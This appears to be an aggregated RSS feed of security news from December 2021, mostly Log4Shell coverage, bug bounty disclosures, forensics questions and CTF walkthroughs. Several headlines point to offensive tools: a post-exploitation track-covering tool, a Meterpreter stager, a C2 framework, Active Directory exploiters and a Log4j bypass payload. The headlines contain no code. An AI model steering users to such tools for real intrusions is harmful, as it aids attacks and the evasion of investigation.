    I don't have the ability to block DoH because of legal/politics. So what is the best way to get an idea for the DNS name? The only sources I know are: Domain names extracted from SSL certificates Autonomous System lookups combined with maybe port number Manual DNS lookups I can't break SSL with a proxy, either. I have no idea what the best way to go about this is, or if there is some other data that can be combined with all of this to make identifying the IP easier. Does anyone know of some options? submitted by /u/greyyit [link] [comments]  ( 1 min )
    Guys I recently download some photorecover apps and I'm scared that they might have stolen my photos
    Are most google play apps malicious to the extent that they steal photos and sell my privacy? I already installed them and deleted them and now I'm trembling with fear. submitted by /u/WhiteSwordMaster [link] [comments]  ( 1 min )
    ModSecurity: Add custom error page or header to blocked requests
    Hi, Using an Nginx ingress, is it possible to add a header or present a custom error page for requests that were blocked by ModSecurity? (or is it using the Ingress settings?) submitted by /u/QuickWin1 [link] [comments]  ( 1 min )
  • Open

    【安全通报】Apache HTTP Server 更新多个安全漏洞(CVE-20...
    近日,Apache HTTP Server 发布安全更新,修复了 Apache HTTP Server 中的服务端请求伪造(SSRF)和缓冲区...  ( 1 min )
  • Open

    【安全通报】Apache HTTP Server 更新多个安全漏洞(CVE-20...
    近日,Apache HTTP Server 发布安全更新,修复了 Apache HTTP Server 中的服务端请求伪造(SSRF)和缓冲区...  ( 1 min )
  • Open

    Ansible Red Hat detector Remote Code Execution – Log4j (CVE-2021-44228)
    Article URL: https://github.com/lucab85/log4j-cve-2021-44228 Comments URL: https://news.ycombinator.com/item?id=29643144 Points: 1 # Comments: 0  ( 3 min )
    Detect and fix Log4j log4shell vulnerability (CVE-2021-44228)
    Article URL: https://github.com/Nanitor/log4fix Comments URL: https://news.ycombinator.com/item?id=29638794 Points: 1 # Comments: 0  ( 2 min )
  • Open

    Network Security Trends: August-October 2021
    Network attacks observed August-October 2021 included high levels of cross-site scripting, code execution and directory traversal. The post Network Security Trends: August-October 2021 appeared first on Unit42.
  • Open

    I made a tool to cover your tracks post-exploitation on Linux machines for Red Teamers
    submitted by /u/mufeedvh [link] [comments]  ( 2 min )
    Hook Heaps and Live Free
    submitted by /u/jat0369 [link] [comments]
    Common security issues when configuring HTTPs connections in Android
    submitted by /u/Masrepus [link] [comments]  ( 2 min )
    Android application testing using windows 11 and windows subsystem for android
    submitted by /u/0xdea [link] [comments]
    RCE in Visual Studio Code's Remote WSL for Fun and Negative Profit
    submitted by /u/parsiya2 [link] [comments]  ( 4 min )
  • Open

    Log4j Vulnerability Explanation In Details
    Everything you need to know about log4j vulnerability as a hacker !  ( 4 min )
    Bypassing OTP Verification for Changing PIN in Registered Mobile Banking Account.
    Assalamu’alaikum (Peace be upon you)  ( 4 min )
    Inclusion TryHackme
    Hi, amazing hackers I today came another interesting topic which is local file inclusion. Local File Inclusion is part of OWASP's top 10…  ( 2 min )
    Static from HackTheBox — Detailed Walkthrough
    Showing all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 13 min )
  • Open

    Log4j Vulnerability Explanation In Details
    Everything you need to know about log4j vulnerability as a hacker !  ( 4 min )
    Bypassing OTP Verification for Changing PIN in Registered Mobile Banking Account.
    Assalamu’alaikum (Peace be upon you)  ( 4 min )
    Inclusion TryHackme
    Hi, amazing hackers I today came another interesting topic which is local file inclusion. Local File Inclusion is part of OWASP's top 10…  ( 2 min )
    Static from HackTheBox — Detailed Walkthrough
    Showing all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 13 min )
  • Open

    Log4j Vulnerability Explanation In Details
    Everything you need to know about log4j vulnerability as a hacker !  ( 4 min )
    Bypassing OTP Verification for Changing PIN in Registered Mobile Banking Account.
    Assalamu’alaikum (Peace be upon you)  ( 4 min )
    Inclusion TryHackme
    Hi, amazing hackers I today came another interesting topic which is local file inclusion. Local File Inclusion is part of OWASP's top 10…  ( 2 min )
    Static from HackTheBox — Detailed Walkthrough
    Showing all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 13 min )
  • Open

    Understanding the Impact of Apache Log4j Vulnerability
    Article URL: https://security.googleblog.com/2021/12/understanding-impact-of-apache-log4j.html Comments URL: https://news.ycombinator.com/item?id=29639132 Points: 1 # Comments: 0  ( 6 min )
    What is the Log4j vulnerability and should I do anything to protect myself?
    Article URL: https://www.washingtonpost.com/technology/2021/12/20/log4j-hack-vulnerability-java/ Comments URL: https://news.ycombinator.com/item?id=29638820 Points: 2 # Comments: 0  ( 1 min )
    Detect and fix Log4j log4shell vulnerability (CVE-2021-44228)
    Article URL: https://github.com/Nanitor/log4fix Comments URL: https://news.ycombinator.com/item?id=29638794 Points: 1 # Comments: 0  ( 2 min )
    Log4j vulnerability: what should boards be asking?
    Article URL: https://www.ncsc.gov.uk/blog-post/log4j-vulnerability-what-should-boards-be-asking Comments URL: https://news.ycombinator.com/item?id=29635047 Points: 1 # Comments: 0
    Is log4js-node affected by the log4s vulnerability? (no)
    Article URL: https://github.com/log4js-node/log4js-node/issues/1105 Comments URL: https://news.ycombinator.com/item?id=29632280 Points: 1 # Comments: 1  ( 3 min )
  • Open

    SecWiki News 2021-12-21 Review
    国外网络演习思考 by ourren CaptfEncoder: 一款跨平台网络安全工具套件 by guyoung 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2021-12-21 Review
    国外网络演习思考 by ourren CaptfEncoder: 一款跨平台网络安全工具套件 by guyoung 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Log4j: A forcing function to adopt long-overdue continuous security
    Are you prepared for the next big zero day exploit? Read what we learned from the Log4j crisis and what you can do to secure your assets with continuous AppSec. READ MORE  ( 4 min )
    Trends that underscore the seriousness of the cybersecurity skills gap
    It is no secret that there’s a glaring skills gap in cybersecurity. Learn more about the trends impacting AppSec success and the steps that can help bridge gaps in DevSecOps workflows. READ MORE  ( 6 min )
  • Open

    MCFE certification
    So I took the MCFE about 4 days ago, passed, and I haven't heard back from magnet about my certification. Should I contact someone or just wait a while longer? submitted by /u/bath_and_toaster [link] [comments]  ( 1 min )
    Need help on the state of and keywords for mobile device tracking in 1999
    Everybody look at their shelves and find books/software from 1999. Thank you for any pointers to books or sources. Not an attorney, just helping a friend doing life. Working up an appeal and several FOIA requests and searching for exact phrasing to use. What software/hardware/process existed in 1999 for any level of law enforcement to trace cell tower movements? Feds to state levels. Suspecting it was all tower techs as time permitted. Was any GPS data on a 2G flip worth looking at back in 1999? Looking for more than cell tower data in there maybe? Any specific references to law enforcement access to request tower pings, especially near Kentucky, 1999. (1999) My friend asked his attorneys to get the cell tower data and the lawyer contacted a tech that gave them a highly technical handwritten reply. This note was lost. Police did not produce cell data to place him at scene in a nearby state, KY. Suspect it was suppressed and it needs to be found as a purchase for software/training or Federal cooperation of some department that I am guessing at, like the FCC, FBI or the actual phone company. Thanks again! I am old school, OpenVMS VAX/Alphas ~Peace submitted by /u/OK_AquaFarmer [link] [comments]  ( 3 min )
  • Open

    CVE-2021-42287/CVE-2021-42278 Scanner & Exploiter Fork with some improvements
    submitted by /u/v1brio [link] [comments]
    Powershell .Net Assembly loader for the [CVE-2021-42287 - CVE-2021-42278] Scanner & Exploiter
    submitted by /u/v1brio [link] [comments]
  • Open

    物流巨头数据泄露、网络钓鱼攻击冒充辉瑞|12月21日全球网络安全热点
    美国塔尔萨市政府花费200万美元耗时8个月从勒索软件攻击中恢复过来。  ( 1 min )
    PyMICROPSIA:双尾蝎的新型信息窃取木马再度来袭
    近日,奇安信威胁情报中心红雨滴团队在日常的威胁狩猎中捕获了该组织以Python构建的攻击样本,该类样本最早由国外厂商发现并命名为PyMICROPSIA。  ( 1 min )
    云原生之Kubernetes安全
    随着越来越多企业开始上云的步伐,在攻防演练中常常碰到云相关的场景,例如:公有云、私有云、混合云、虚拟化集群等。  ( 3 min )
    DDoS和CC攻击原理(下)
    本文描述ddos和cc的防护机制。  ( 1 min )
    T-Mobile 今年已拦截210亿个诈骗电话,一半以上与车辆保修诈骗有关
    平均每月识别并拦截 18 亿个企图诈骗电话,也就是每秒 700 个企图诈骗电话!  ( 1 min )
    还能这样执行命令?命令执行绕过及防护规则研究
    命令执行绕过及防护规则研究  ( 1 min )
    黑客利用Log4Shell漏洞攻击比利时国防部
    比利时国防部遭到了网络攻击。
    Clop勒索软件团伙正在泄露英国警方机密数据
    Clop勒索软件团伙成功窃取了英国警方的机密数据,并在暗网上泄露。
    Log4j2远程代码执行漏洞检测和防护策略研究
    Log4j2漏洞已爆出有一段时间,关于如何修复该漏洞各大安全厂商也给出了相应的解决方案。
    ​零时科技 | DeFi平台Grim Finance攻击事件分析
    北京时间2021年12月19日,Grim Finance官方发推文称平台被外部攻击者利用,攻击者盗币价值超过3000万美元。  ( 1 min )
    探寻中国网安行业新兴力量 | 首届「网安新势力」大会筹备启动
    伴随「CIS 2021网络安全创新大会Spring·春日版」的召开,第一届「网安新势力」筹备工作正式启动。
    Meta对网络钓鱼攻击提起诉讼
    Meta正在对网络钓鱼攻击者和出于恶意目的滥用该平台的人,提起的一系列诉讼。  ( 1 min )
  • Open

    admin password disclosure via log file
    Acronis disclosed a bug submitted by darkdream: https://hackerone.com/reports/1121972 - Bounty: $100
    Log4j RCE on https://judge.me/reviews
    Judge.me disclosed a bug submitted by bhishma14: https://hackerone.com/reports/1427589 - Bounty: $50
  • Open

    USA Movies
    submitted by /u/Yankeeslv [link] [comments]  ( 1 min )
  • Open

    Custom Metasploit Module for Log4Shell Scanner
    In this article, we will discuss a customized Metasploit module I wrote for scanning applications vulnerable to Log4Shell as well as how… Continue reading on Medium »  ( 3 min )

  • Open

    Is it possible to encrypt my browsing data in a public wi-fi without using a VPN?
    I've been thinking a lot about this since recently a coffee shop near me opened, and it had open wifi. I do not want to pay for a VPN since I do not trust them for my data to show up as encrypted into the network. I found this on GitHub, but I have not tested it enough to see if it works. So can someone give any help with that? submitted by /u/ArturEPinheiro777 [link] [comments]  ( 2 min )
    Best Practices with Email DLP Exceptions
    Hey Guys, So we have our entire org covered with email DLP from O365, one of our vendors generally deals with sensitive data(social security numbers) and thus have requested to have a exception for them, what should be the best way to deal with it. Bypassing the entire DLP policy for an email ID although sounds easy but wanted to hear back some feedback on the best practices submitted by /u/w33ha_AD [link] [comments]  ( 1 min )
    I've read about multiple data breaches at US cell phone carriers (ex: AT&T, T-Mobile). Where is this data going? Is there a way I can see if my information is floating around and how widely it is distributed?
    Basically, these hacks are pretty significant and I'd like to know both the depth and breadth of what people know about my personal information. Inb4: It's all out there, I suppose it is, but I want to know the specifics, if only out of curiosity. Like, if one alpha hacker knows and doesn't share it with anybody, I'm probably good because I'm neither rich nor famous enough to really draw his or her attention. If it's out in the open for all to see, on the other hand, somebody might harass me. I use a Yubikey so I'm good there. Thank you! submitted by /u/iExtrapolate314 [link] [comments]  ( 2 min )
    Owning Internal networks is way too easy, what could Microsoft do to improve the situation?
    It's more surprising when you don't get domain admin. So many things are broken, the terrible implementation of name resolution, machines caching login credentials, passing the hash, golden tickets, NTLM relay, IPv6, WPAD, the list goes on. Surely there must be a better way. What are some improvements you would like to see from Microsoft? submitted by /u/ImTheMaddest [link] [comments]  ( 6 min )
  • Open

    Intruding 5G SA core networks from outside and inside
    submitted by /u/sebazzen [link] [comments]
    OSS Getting Hammered for BigCorp Failures
    submitted by /u/GelosSnake [link] [comments]  ( 1 min )
    Inside a PBX - Discovering a Firmware Backdoor
    submitted by /u/RedTeamPentesting [link] [comments]  ( 1 min )
    letme.go - A minimalistic Meterpreter stager written in Go
    submitted by /u/0xdea [link] [comments]  ( 1 min )
    Log4j Vulnerability CVE-2021-45105: What You Need to Know (and how it differs from CVE-2021-45046)
    submitted by /u/ScottContini [link] [comments]  ( 1 min )
  • Open

    A Simple Geolocation Exercise
    In September 2020, British army paratroopers performed a joint training excise with Ukrainian armed forces as part of Exercise Joint… Continue reading on Medium »  ( 3 min )
    How Not to Get “Caught” — An OPSEC (Operational Security) Advice Aware Analysis of a Modern…
    Have you ever dreamed of getting “caught” and actually making the headlines with your latest research that also includes the digirally… Continue reading on Medium »  ( 4 min )
    Setting them Straight — 10 Years Back in the Future — A Brief Overview of the Hacker Scene Circa…
    Do you remember the hacker scene circa the 90s? Check out this brief analysis of the Scene up to present day back then. Keep reading. Continue reading on Medium »  ( 5 min )
  • Open

    An adorable twenty-seven second stop-motion video titled, "themonster.mov"
    submitted by /u/HGMIV926 [link] [comments]  ( 2 min )
    pictures of britain
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    Betty's recipes.
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    Sharing my movie theme music collection
    submitted by /u/ercohn [link] [comments]  ( 1 min )
    X Files complete series 1080p (English and Spanish subs)
    submitted by /u/Skajuan [link] [comments]  ( 1 min )
  • Open

    Inverting PhotoDNA with Machine Learning
    submitted by /u/anishathalye [link] [comments]  ( 1 min )
    X-Ways handling of ad1 images
    Does X-Ways have an issue with ad images? I currently have at least 200 ad1 images from a 750gb disk unallocated space. I need to do data carving on the totality of the images. When doing “refine volume snapshot” one image at a time, I sometimes have files that do not really represent what I am searching for. For example, on one image I could carve 18 files, all mp3 files. These are not the files I am looking for. I am searching for doc/docx files that I know are there (we did live forensic before acquiring the hdd). What are your thoughts on this? submitted by /u/MisterTroubadour [link] [comments]  ( 3 min )
  • Open

    SecWiki News 2021-12-20 Review
    SecWiki周刊(第407期) by ourren CIS 介绍(下)-CIS Benchmark&CIS 社区防御模型2.0 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2021-12-20 Review
    SecWiki周刊(第407期) by ourren CIS 介绍(下)-CIS Benchmark&CIS 社区防御模型2.0 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Shellcode Generation with The Radare2 Framework
    submitted by /u/DLLCoolJ [link] [comments]
  • Open

    Log4j Vulnerability – What You Need to Know and How to Address Immediately
    Article URL: https://www.crestdatasys.com/blogs/log4j-vulnerability-what-you-need-to-know-and-how-to-address-immediately/ Comments URL: https://news.ycombinator.com/item?id=29622121 Points: 3 # Comments: 0  ( 4 min )
    Apache Log4j 2 vulnerability – Detection and fix simplified in your Java code
    Article URL: https://medium.com/@amitsoni4774/apache-log4j-2-vulnerability-detection-and-fix-simplified-in-your-java-code-9a6dd1d06796 Comments URL: https://news.ycombinator.com/item?id=29620987 Points: 2 # Comments: 0  ( 2 min )
  • Open

    Fuzzing
    Article URL: https://owasp.org/www-community/Fuzzing Comments URL: https://news.ycombinator.com/item?id=29620816 Points: 2 # Comments: 0  ( 4 min )

  • Open

    Moving my server sooo grab what you want. Super fast speeds TV/Music/Movies
    submitted by /u/Bryan2pointOh [link] [comments]  ( 1 min )
    What's your F***ing problem ?
    Hi everyone. I would like to talk about a subject that I consider abnormal. ​ First of all I would like to clarify that: ​ - I would like to apologize for this off topic - This post does not concern the 99% of OpenDirectories users, whom I also thank to keep this subreddit alive and for their work. - I would like to thank the moderation team, who do an excellent job. - I don't give a damn about karma points, my account can drop to -10,000, I don't care, it's just an "aesthetic feature". ​ There are times when some users post sites that they haven't thoroughly reviewed, and that's okay. In these publications, it happens that some content is illegal, immoral or whatever ... It is not the fault of the users who provided the link, it is something that happens. ​ But why, for cryi…  ( 4 min )
  • Open

    log4j — Getting to 2.16 and 2.17 is Only Critical If You Have Non-Default Logging Enabled
    submitted by /u/danielrm26 [link] [comments]  ( 2 min )
    Alan c2 post-exploitation framework v5.0 - All you can in-memory edition
    submitted by /u/aparata_s4tan [link] [comments]
  • Open

    All in One SEO Plugin Vulnerability Affects 3M Sites
    Article URL: https://www.searchenginejournal.com/all-in-one-seo-vulnerability-2021/430230/ Comments URL: https://news.ycombinator.com/item?id=29615935 Points: 1 # Comments: 0  ( 4 min )
    Understanding the Impact of Apache Log4j Vulnerability
    Article URL: https://security.googleblog.com/2021/12/understanding-impact-of-apache-log4j.html Comments URL: https://news.ycombinator.com/item?id=29611871 Points: 2 # Comments: 0  ( 6 min )
    Deep Understanding of Commits for Automated Vulnerability Identification
    Article URL: https://sites.google.com/view/du-commits/ Comments URL: https://news.ycombinator.com/item?id=29611738 Points: 1 # Comments: 0  ( 1 min )
    Xcode 13.2 contains Log4j vulnerability
    Article URL: https://developer.apple.com/forums/thread/696785 Comments URL: https://news.ycombinator.com/item?id=29610913 Points: 181 # Comments: 41  ( 4 min )
  • Open

    GDB/Pedas Help
    I've set up GDB and Peda, and peda works fine except some commands require sudo. However, whenever I run GDB with sudo, it loads plain GDB without peda. I've edited the .gdbinit file as the instructions say. Any help would be appreciated. submitted by /u/Radiant-Midnight-278 [link] [comments]
  • Open

    I made a tool to cover your tracks post-exploitation on Linux machines for Red Teamers
    submitted by /u/mufeedvh [link] [comments]  ( 1 min )
    Alan c2 post-exploitation framework v5.0 - All you can in-memory edition
    submitted by /u/aparata_s4tan [link] [comments]  ( 1 min )
  • Open

    The Insidious Need for Speed
    “We need it yesterday. Speed kills. Coffee is for closers. First to market. If you’re in control, you’re not going fast enough.” Continue reading on Medium »  ( 4 min )
    OSINT CASE STUDY 1
    disclaimer: education purpose only Continue reading on Medium »  ( 2 min )
    Uncovering the hackers, who stole your Facebook account
    About 6-months ago I was sitting at my desk, working on my CS145 homework, when I heard a familiar ding, a new message on Facebook… Continue reading on Medium »  ( 4 min )
  • Open

    SecWiki News 2021-12-19 Review
    SPEL表达式注入漏洞深入分析 by ourren 基于异常行为检测CobaltStrike by ourren 基于规则向量化的HTTP资产识别方法探索 by ourren 浅谈被动式IAST产品与技术实现-代码实现Demo篇 by ourren 浅谈被动式IAST产品与技术实现-基础篇 by ourren Codeql 挖洞? by ourren 应急响应:没有痕迹该如何进行攻击溯源 by ourren 几款小众而实用的远控软件 by ourren iMessage 零点击漏洞利用细节公开 by ourren ACSAC 2021 论文录用列表 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2021-12-19 Review
    SPEL表达式注入漏洞深入分析 by ourren 基于异常行为检测CobaltStrike by ourren 基于规则向量化的HTTP资产识别方法探索 by ourren 浅谈被动式IAST产品与技术实现-代码实现Demo篇 by ourren 浅谈被动式IAST产品与技术实现-基础篇 by ourren Codeql 挖洞? by ourren 应急响应:没有痕迹该如何进行攻击溯源 by ourren 几款小众而实用的远控软件 by ourren iMessage 零点击漏洞利用细节公开 by ourren ACSAC 2021 论文录用列表 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    digital world.local: Vengeance Vulnhub Walkthrough
    Donavan’s VENGEANCE (digitalworld.local: VENGEANCE) is a medium level machine designed for Vulnhub. This lab includes a difficult exploitation procedure that is suitable for those experienced The post digital world.local: Vengeance Vulnhub Walkthrough appeared first on Hacking Articles.  ( 7 min )
  • Open

    digital world.local: Vengeance Vulnhub Walkthrough
    Donavan’s VENGEANCE (digitalworld.local: VENGEANCE) is a medium level machine designed for Vulnhub. This lab includes a difficult exploitation procedure that is suitable for those experienced The post digital world.local: Vengeance Vulnhub Walkthrough appeared first on Hacking Articles.  ( 7 min )
  • Open

    Unauthorized access to choice.av.ru control panel
    Azbuka Vkusa disclosed a bug submitted by wocat: https://hackerone.com/reports/963161 - Bounty: $100
    Open redirect (DOM-based) on av.ru via "return_url" parameter (Login form)
    Azbuka Vkusa disclosed a bug submitted by zophi: https://hackerone.com/reports/958864 - Bounty: $100
    Dependency repository hijacking aka Repo Jacking from GitHub repo rubygems/bundler-site & rubygems/bundler.github.io + bundler.io docs
    RubyGems disclosed a bug submitted by akincibor: https://hackerone.com/reports/1430405
  • Open

    [Cullinan #24] Add ESI Injection and Update Others
    컬리넌 업데이트 로그 #24입니다. ESI Injection을 추가했고, SSTI에 RCE 관련 내용 추가, 그리고 도구 업데이트가 있었습니다. 마지막으로 Cullinan의 메인 페이지 디자인의 일부를 수정(max-width 제거)했습니다. Add ESI Injection Update SSTI (Add RCE, Update Tools) Update Cullinan Design ESI Injection은 제가 블로그 글로 공유드린지 벌써 3년도 넘은 항목인데요, 실무에서도 자주 보이는 케이스는 아니라서 잊고 있다가 최근에 Cullinan 쪽으로 추가하게 됬습니다. 그래도 재미있는 취약점이니 한번쯤은 읽어보시는 것 추천드립니다 :D
  • Open

    Trip.com: First Step towards Cloud Native Security
    TL; DR This post shares our explorations on cloud native securities for Kubernetes as well as legacy workloads, with CiliumNetworkPolicy for L3/L4 access control as the first step. TL; DR 1 Introduction 1.1 Access control in Kubernetes 1.2 Implementation and extension in Cilium 1.3 Challenges in large deployments 1.4 Organization of this post 2 Access control: from requirements to a solution 2.1 Policy enforcement in a single cluster 2.2 Policy enforcement over multiple clusters 2.2.1 ClusterMesh 2.2.2 KVStoreMesh 2.3 Policy enforcement over legacy clients 2.3.1 CiliumExternalResource (CER) 2.3.2 cer-apiserver 2.3.3 Sum up: a hybrid data plane 2.4 Control plane 2.4.1 Access control policy (ACP) modeling 2.4.2 Enforcer-specific adapters 2.4.3 Push (and reconc…

  • Open

    Log4j 2.17.0 released, for third CVE (CVE-20 21-45105)
    Article URL: https://logging.apache.org/log4j/2.x/index.html Comments URL: https://news.ycombinator.com/item?id=29609578 Points: 3 # Comments: 2  ( 5 min )
    Third High Severity CVE in Log4j Is Published
    Article URL: https://logging.apache.org/log4j/2.x/security.html Comments URL: https://news.ycombinator.com/item?id=29604097 Points: 430 # Comments: 306  ( 11 min )
  • Open

    Patch fixing critical Log4j 0-day has its own vulnerability that’s under exploit
    Article URL: https://arstechnica.com/information-technology/2021/12/patch-fixing-critical-log4j-0-day-has-its-own-vulnerability-thats-under-exploit/ Comments URL: https://news.ycombinator.com/item?id=29609295 Points: 2 # Comments: 0  ( 3 min )
    Apache Log4j Vulnerability Webinar – What You Need to Know
    Article URL: https://www.criticalinsight.com/resources/news/article/apache-log4j-vulnerability-webinar-what-you-need-to-know/ Comments URL: https://news.ycombinator.com/item?id=29608959 Points: 1 # Comments: 0  ( 2 min )
  • Open

    How.It.Made
    submitted by /u/ohimjustakid [link] [comments]  ( 1 min )
    A few directories with small amount of music
    Index of /stuff/mp3/amd (audio.msk.ru) Index of /music/funk (czyborra.com) Index of /files (rarekindrecords.co.uk) Index of /audio/ (martindoyleflutes.com) (music from an irish flute player) Index of /files/mp3 (saparov.ru) Index of /albums/4151 (soton.ac.uk) submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Want to know some line-dancing moves? Here's some PDFs that show you some dance steps.
    submitted by /u/HGMIV926 [link] [comments]  ( 1 min )
  • Open

    Reasons to go looking in the Registry
    Chris Sanders tweeted out an interesting pair of questions recently, and the simple fact is that for me to fully answer the question, the tweet thread would be just too extensive. The questions were: What are the most common reasons you go looking in the Windows registry? What do you use it to prove most? Like almost everything else in DFIR, my response to the both questions is, it depends. Why? Well, it depends upon the goals of your investigation. What I use the Registry to prove depends heavily on what I'm trying to prove, or to disprove. This may sound pretty obvious, and even intuitive, but far too often in DFIR, we can find ourselves far too easily chasing down rabbit holes that have little, if anything, to do with our investigative goals. Configuration The Windows Registry holds a g…  ( 7 min )
  • Open

    Preferred method of collecting folders or loose documents on Macs ?
    I'm using Sumuri Recon and looking through the features but it seems to be an all or nothing product (imaging the entire disk/volume. This is not confirmed by any means. I haven't spent enough time with Sumuri but It doesn't appear to allow for Collection of specific folders. Anyone here have experience with small targeted forensic sound collections on Macs. The hardware dongle makes this a small painpoint as it would be nice to remotely preserve a few documents in a defensible manner. This is very simple when dealing with Windows devices where FTK imager can be installed and executed within seconds. Anyone aware of a Mac APFS equivalent? This particular remote MacBook pro is on Catalina (APFS) and I have all the keys to the castle. I'm not as interested in preserving extended Metadata as I am in the plain created and modified date. Perhaps a zipping solution that preserves these two dates? submitted by /u/zero-skill-samus [link] [comments]  ( 1 min )
    How does forensic imaging of locked cellular devices work?
    I've been looking into mobile forensics and I've realized that everything I come across pertaining to imaging a filesystem starts with "Unlock the device". This doesn't quite make sense to me, because if an LEO gets a warrant to search a phone, the owner obviously doesn't have to tell them/enter the password. And from what I can tell, the only way to really "get" the password starts off with imaging the filesystem/creating a backup. Am I missing something? submitted by /u/Fusiondew [link] [comments]  ( 4 min )
    CCTV went down
    Hello to all forensicators, We have a weird situation where about 20 of our CCTVs just stopped recording. One of our external vendors was running a VAPT test on the vlan containing the cameras at the same time they went down. The CCTV logs show us that XSS and SQL injection attacks were being run on the cameras. Checking the application log tells us the time when the cameras stopped recording and the time they got back online. However I am unable to figure out what was the exact attack that brought down the cameras. What logs should I be looking at to figure this out? submitted by /u/indianadmin [link] [comments]  ( 1 min )
    VPN data exfiltration
    A colleague of mine was referencing someone using a Kali Linux USB drive on a windows 10 machine and connecting to a VPN. They believe the individual was pushing business related data through the VPN that was unauthorized. Is there anything forensically that one could look for on what might have gone outbound on the EO1? submitted by /u/WhoAteTheLastCookie [link] [comments]  ( 2 min )
  • Open

    A Detailed Guide on Log4J Penetration Testing
    In this article, we are going to discuss and demonstrate in our lab setup, the exploitation of the new vulnerability identified as CVE-2021-44228 affecting the The post A Detailed Guide on Log4J Penetration Testing appeared first on Hacking Articles.  ( 8 min )
  • Open

    A Detailed Guide on Log4J Penetration Testing
    In this article, we are going to discuss and demonstrate in our lab setup, the exploitation of the new vulnerability identified as CVE-2021-44228 affecting the The post A Detailed Guide on Log4J Penetration Testing appeared first on Hacking Articles.  ( 8 min )
  • Open

    SecWiki News 2021-12-18 Review
    CVE-2016-7124反序列化漏洞复现 by SecIN社区 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2021-12-18 Review
    CVE-2016-7124反序列化漏洞复现 by SecIN社区 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    ESI(Edge Side Include) Injection
    🔍 Introduction ESIi는 ESI(Edge Side Include) Injection으로 ESI 사용하는 환경에서 해당 Markup에 대한 Injection 공격을 의미합니다. ESI는 Edge Side Include의 약자로 인터넷의 Edge에서 웹 애플리케이션의 동적 어셈블리 및 전송을 위한 웹 페이지 구성 요소를 정의하는 데 사용되는 간단한 마크업 언어입니다. Page assembly를 위한 표준 태그로 웹 캐시, LB 등의 구조에서 사용됩니다. HTML 코드 내에서 ESI는 아래와 같이 태그로 웹 브라우저로 Response body가 넘어오기 전에 ESI를 처리할 수 있는 캐시 서버등에서 미리 처리되어 데이터가 넘어오게 됩니다.
  • Open

    HackMyVM — Forbidden
    Writeup (Español) Continue reading on Medium »  ( 3 min )
    Should You Trust Your Admin Tools?
    No, not really Continue reading on Medium »  ( 4 min )
  • Open

    Stored XSS on 1.4.0
    ImpressCMS disclosed a bug submitted by tehwinsam: https://hackerone.com/reports/1331281
    HTML injection in email content during registration via FirstName/LastName parameter
    MTN Group disclosed a bug submitted by ibrahimatix_: https://hackerone.com/reports/1256496
    Flickr Account Takeover using AWS Cognito API
    Flickr disclosed a bug submitted by lauritz: https://hackerone.com/reports/1342088 - Bounty: $7550
  • Open

    Alternative Process Injection
    submitted by /u/dmchell [link] [comments]
  • Open

    lurch1317: A new pidgin plugin with strong crypto for deniablity (WIP)
    submitted by /u/hardenedvault [link] [comments]  ( 1 min )
    Log4j version 2.17.0 fixes a new problem CVE-2021-45105 DoS vuln (CVSS score of 7.5)
    submitted by /u/ScottContini [link] [comments]  ( 2 min )
  • Open

    [Day 16] OSINT Ransomware Madness | Advent of Cyber 3 (2021)
    OSINT stands for Open Source Intelligence, information that can be obtained from free and public sources. Offensive teams commonly use… Continue reading on Medium »  ( 3 min )

  • Open

    Threat Intelligence on Log4j CVE: Key Findings and Their Implications
    Article URL: https://www.akamai.com/blog/security/threat-intelligence-on-log4j-cve-key-findings-and-their-implications Comments URL: https://news.ycombinator.com/item?id=29599546 Points: 1 # Comments: 0  ( 6 min )
    Security in context: When is a CVE not a CVE?
    Article URL: https://snyk.io/blog/when-is-a-cve-not-a-cve/ Comments URL: https://news.ycombinator.com/item?id=29589692 Points: 2 # Comments: 0  ( 5 min )
    Bypass of allowedLdapHost check in Log4j 2.15.0 – Log4Shell (CVE-2021-44228)
    Article URL: https://twitter.com/marcioalm/status/1471740771581652995 Comments URL: https://news.ycombinator.com/item?id=29588947 Points: 3 # Comments: 1  ( 1 min )
    Risk analysis of Log4Shell (CVE-2021-44228) and mitigation
    Article URL: https://hardenedvault.net/2021/12/17/analysis-CVE-2021-44228.html Comments URL: https://news.ycombinator.com/item?id=29587870 Points: 1 # Comments: 0  ( 4 min )
  • Open

    If You're Not Doing Continuous Asset Management You're Not Doing Security
    submitted by /u/danielrm26 [link] [comments]  ( 3 min )
    Fail2ban / Regexp rule against LOG4J vuln
    submitted by /u/AGS42 [link] [comments]
    Log4Shell Update: Full bypass found in log4j 2.15.0, enabling RCE again (with payload)
    submitted by /u/freeqaz [link] [comments]  ( 2 min )
  • Open

    A website's gone
    What happened to the.eye? Is it dead, dead or is there a second website? Also, the link to the discord that the automod gave me was invalid. submitted by /u/Sleepingpiranha [link] [comments]  ( 2 min )
    A large collection of indiscriminately-named mp3 music.
    submitted by /u/HGMIV926 [link] [comments]  ( 1 min )
    Sparks albums
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
  • Open

    html injection at judge.me
    Judge.me disclosed a bug submitted by 0xteles: https://hackerone.com/reports/1036995
    Reflected Cross-Site Scripting/HTML Injection
    Informatica disclosed a bug submitted by jak0_: https://hackerone.com/reports/1379158
  • Open

    SecWiki News 2021-12-17 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2021-12-17 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    CALDERA
    Hey everyone, Does anyone here use or have used CALDERA? A small question regarding initial access; Are we meant to deploy an agent locally then do lateral movement within the network to reach another target machines? Thank you! submitted by /u/lifeislemon_not_cake [link] [comments]  ( 1 min )
  • Open

    Apache Log4j 2, Flexera and you
